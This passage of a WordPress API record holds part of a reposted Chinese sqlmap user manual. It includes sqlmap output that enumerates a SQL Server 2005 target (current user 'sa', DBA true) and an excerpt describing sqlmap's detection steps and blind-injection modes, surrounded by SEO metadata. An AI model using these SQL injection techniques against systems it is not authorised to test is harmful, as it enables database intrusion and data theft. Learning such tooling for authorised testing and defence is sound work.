New';\">Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005&nbsp;&#8211;&nbsp;9.00.1399.06&nbsp;(Intel&nbsp;X86)&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Oct&nbsp;14&nbsp;2005&nbsp;00:33:37&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Copyright&nbsp;(c)&nbsp;1988-2005&nbsp;Microsoft&nbsp;Corporation<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Express&nbsp;Edition&nbsp;on&nbsp;Windows&nbsp;NT&nbsp;5.1&nbsp;(Build&nbsp;2600:&nbsp;Service&nbsp;Pack&nbsp;2)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8212;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">current&nbsp;user:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;sa&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">current&nbsp;database:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;testdb&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">current&nbsp;user&nbsp;is&nbsp;DBA:&nbsp;&nbsp;&nbsp;&nbsp;True<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;shutting&nbsp;down&nbsp;at&nbsp;11:25:52<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\n\t\u5f53\u7ed9sqlmap\u8fd9\u4e48\u4e00\u4e2aurl\u7684\u65f6\u5019\uff0c\u5b83\u4f1a\uff1a\n<\/p>\n<pre class=\"prettyprint\"><span class=\"lit\">1<\/span><span class=\"pun\">\u3001\u5224\u65ad\u53ef\u6ce8\u5165\u7684\u53c2\u6570<\/span><span class=\"lit\">2<\/span><span class=\"pun\">\u3001\u5224\u65ad\u53ef\u4ee5\u7528\u90a3\u79cd<\/span><span class=\"pln\">SQL<\/span><span class=\"pun\">\u6ce8\u5165\u6280\u672f\u6765\u6ce8\u5165<\/span><span class=\"lit\">3<\/span><span class=\"pun\">\u3001\u8bc6\u522b\u51fa\u54ea\u79cd\u6570\u636e\u5e93<\/span><span class=\"lit\">4<\/span><span class=\"pun\">\u3001\u6839\u636e\u7528\u6237\u9009\u62e9\uff0c\u8bfb\u53d6\u54ea\u4e9b\u6570\u636e<\/span><\/pre>\n<p>\n\tsqlmap\u652f\u6301\u4e94\u79cd\u4e0d\u540c\u7684\u6ce8\u5165\u6a21\u5f0f\uff1a\n<\/p>\n<pre class=\"prettyprint\"><span class=\"lit\">1<\/span><span class=\"pun\">\u3001\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5373\u53ef\u4ee5\u6839\u636e\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6761\u4ef6\u771f\u5047\u7684\u6ce8\u5165\u3002<\/span><span class=\"lit\">2<\/span><span class=\"pun\">\u3001\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u5373\u4e0d\u80fd\u6839\u636e\u9875\u9762\u8fd4\u56de\u5185\u5bb9\u5224\u65ad\u4efb\u4f55\u4fe1\u606f\uff0c\u7528\u6761\u4ef6\u8bed\u53e5\u67e5\u770b\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u6267\u884c\uff08\u5373\u9875\u9762\u8fd4\u56de\u65f6\u95f4\u662f\u5426\u589e\u52a0\uff09\u6765\u5224\u65ad\u3002<\/span><span class=\"lit\">3<\/span><span class=\"pun\">\u3001\u57fa\u4e8e\u62a5...<\/span><\/pre>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[321],"tags":[],"class_list":["post-108","post","type-post","status-publish","format-standard","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c - Wayne&#039;s Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/weizn.net\/?p=108\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c - Wayne&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"\u5f53\u7ed9sqlmap\u8fd9\u4e48\u4e00\u4e2aurl\u7684\u65f6\u5019\uff0c\u5b83\u4f1a\uff1a  1\u3001\u5224\u65ad\u53ef\u6ce8\u5165\u7684\u53c2\u65702\u3001\u5224\u65ad\u53ef\u4ee5\u7528\u90a3\u79cdSQL\u6ce8\u5165\u6280\u672f\u6765\u6ce8\u51653\u3001\u8bc6\u522b\u51fa\u54ea\u79cd\u6570\u636e\u5e934\u3001\u6839\u636e\u7528\u6237\u9009\u62e9\uff0c\u8bfb\u53d6\u54ea\u4e9b\u6570\u636e   sqlmap\u652f\u6301\u4e94\u79cd\u4e0d\u540c\u7684\u6ce8\u5165\u6a21\u5f0f\uff1a  1\u3001\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5373\u53ef\u4ee5\u6839\u636e\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6761\u4ef6\u771f\u5047\u7684\u6ce8\u5165\u30022\u3001\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u5373\u4e0d\u80fd\u6839\u636e\u9875\u9762\u8fd4\u56de\u5185\u5bb9\u5224\u65ad\u4efb\u4f55\u4fe1\u606f\uff0c\u7528\u6761\u4ef6\u8bed\u53e5\u67e5\u770b\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u6267\u884c\uff08\u5373\u9875\u9762\u8fd4\u56de\u65f6\u95f4\u662f\u5426\u589e\u52a0\uff09\u6765\u5224\u65ad\u30023\u3001\u57fa\u4e8e\u62a5...\" \/>\n<meta property=\"og:url\" content=\"http:\/\/weizn.net\/?p=108\" \/>\n<meta property=\"og:site_name\" content=\"Wayne&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2014-10-19T13:50:20+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"zinan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"42 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/weizn.net\/#website\",\"url\":\"http:\/\/weizn.net\/\",\"name\":\"Wayne&#039;s Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/weizn.net\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/weizn.net\/?p=108#webpage\",\"url\":\"http:\/\/weizn.net\/?p=108\",\"name\":\"[\\u8f6c]Sqlmap\\u7528\\u6237\\u624b\\u518c - Wayne&#039;s Blog\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/#website\"},\"datePublished\":\"2014-10-19T13:50:20+00:00\",\"dateModified\":\"2014-10-19T13:50:20+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/weizn.net\/?p=108#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/weizn.net\/?p=108\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/weizn.net\/?p=108#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\\u9996\\u9875\",\"item\":\"http:\/\/weizn.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[\\u8f6c]Sqlmap\\u7528\\u6237\\u624b\\u518c\"}]},{\"@type\":\"Article\",\"@id\":\"http:\/\/weizn.net\/?p=108#article\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/?p=108#webpage\"},\"author\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"headline\":\"[\\u8f6c]Sqlmap\\u7528\\u6237\\u624b\\u518c\",\"datePublished\":\"2014-10-19T13:50:20+00:00\",\"dateModified\":\"2014-10-19T13:50:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=108#webpage\"},\"wordCount\":8337,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"articleSection\":[\"\\u5e94\\u7528\\u5b89\\u5168\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\/\/weizn.net\/?p=108#respond\"]}]},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\",\"name\":\"zinan\",\"logo\":{\"@id\":\"http:\/\/weizn.net\/#personlogo\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c - Wayne&#039;s Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/weizn.net\/?p=108","og_locale":"zh_CN","og_type":"article","og_title":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c - Wayne&#039;s Blog","og_description":"\u5f53\u7ed9sqlmap\u8fd9\u4e48\u4e00\u4e2aurl\u7684\u65f6\u5019\uff0c\u5b83\u4f1a\uff1a  1\u3001\u5224\u65ad\u53ef\u6ce8\u5165\u7684\u53c2\u65702\u3001\u5224\u65ad\u53ef\u4ee5\u7528\u90a3\u79cdSQL\u6ce8\u5165\u6280\u672f\u6765\u6ce8\u51653\u3001\u8bc6\u522b\u51fa\u54ea\u79cd\u6570\u636e\u5e934\u3001\u6839\u636e\u7528\u6237\u9009\u62e9\uff0c\u8bfb\u53d6\u54ea\u4e9b\u6570\u636e   sqlmap\u652f\u6301\u4e94\u79cd\u4e0d\u540c\u7684\u6ce8\u5165\u6a21\u5f0f\uff1a  1\u3001\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5373\u53ef\u4ee5\u6839\u636e\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6761\u4ef6\u771f\u5047\u7684\u6ce8\u5165\u30022\u3001\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u5373\u4e0d\u80fd\u6839\u636e\u9875\u9762\u8fd4\u56de\u5185\u5bb9\u5224\u65ad\u4efb\u4f55\u4fe1\u606f\uff0c\u7528\u6761\u4ef6\u8bed\u53e5\u67e5\u770b\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u6267\u884c\uff08\u5373\u9875\u9762\u8fd4\u56de\u65f6\u95f4\u662f\u5426\u589e\u52a0\uff09\u6765\u5224\u65ad\u30023\u3001\u57fa\u4e8e\u62a5...","og_url":"http:\/\/weizn.net\/?p=108","og_site_name":"Wayne&#039;s Blog","article_published_time":"2014-10-19T13:50:20+00:00","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"zinan","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"42 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/weizn.net\/#website","url":"http:\/\/weizn.net\/","name":"Wayne&#039;s Blog","description":"","publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/weizn.net\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"WebPage","@id":"http:\/\/weizn.net\/?p=108#webpage","url":"http:\/\/weizn.net\/?p=108","name":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c - Wayne&#039;s Blog","isPartOf":{"@id":"http:\/\/weizn.net\/#website"},"datePublished":"2014-10-19T13:50:20+00:00","dateModified":"2014-10-19T13:50:20+00:00","breadcrumb":{"@id":"http:\/\/weizn.net\/?p=108#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["http:\/\/weizn.net\/?p=108"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/weizn.net\/?p=108#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"http:\/\/weizn.net\/"},{"@type":"ListItem","position":2,"name":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c"}]},{"@type":"Article","@id":"http:\/\/weizn.net\/?p=108#article","isPartOf":{"@id":"http:\/\/weizn.net\/?p=108#webpage"},"author":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"headline":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c","datePublished":"2014-10-19T13:50:20+00:00","dateModified":"2014-10-19T13:50:20+00:00","mainEntityOfPage":{"@id":"http:\/\/weizn.net\/?p=108#webpage"},"wordCount":8337,"commentCount":0,"publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"articleSection":["\u5e94\u7528\u5b89\u5168"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/weizn.net\/?p=108#respond"]}]},{"@type":["Person","Organization"],"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264","name":"zinan","logo":{"@id":"http:\/\/weizn.net\/#personlogo"}}]}},"_links":{"self":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/108","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=108"}],"version-history":[{"count":0,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/108\/revisions"}],"wp:attachment":[{"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=108"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=108"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=108"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}